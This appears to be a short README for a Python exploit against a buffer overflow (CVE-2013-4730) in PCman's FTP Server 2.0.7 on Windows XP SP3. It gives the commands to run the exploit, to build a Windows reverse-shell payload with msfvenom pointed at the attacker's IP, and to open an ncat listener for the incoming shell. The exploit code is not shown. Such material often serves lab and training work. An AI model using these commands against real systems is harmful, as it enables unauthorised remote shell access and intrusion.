
A very simple buffer overflow using CVE-2013-4730 against PCman's FTP server
A very simple buffer overflow using CVE-2013-4730 against PCman's FTP server v.2.0.7
That easy BoF overwrite the buffer and execute the shellcode that will connect back (reverse shell)
WindowsXP SP3 running PCman's FTP Server at version 2.0.7
~$ python3 PCman.py <host> <port>
~$ sudo ./msfvenom windows/shell_reverse_tcp LHOST=<your ip> LPORT=4444
~$ ncat -lvp <shellcode port>